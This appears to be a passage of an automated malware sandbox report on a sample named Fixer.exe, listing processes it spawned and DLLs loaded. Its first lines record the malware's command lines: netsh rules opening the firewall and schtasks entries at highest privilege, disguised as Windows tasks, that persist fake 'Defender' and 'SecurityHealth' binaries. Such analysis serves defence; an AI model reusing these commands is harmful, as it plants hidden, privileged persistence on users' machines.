                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\Defender.exe "C:\Windows\System32\Defender.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: cscui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: workfoldersshell.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: usermgrproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cscui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: workfoldersshell.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: usermgrproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: version.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: version.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: version.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: version.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeSection loaded: userenv.dll
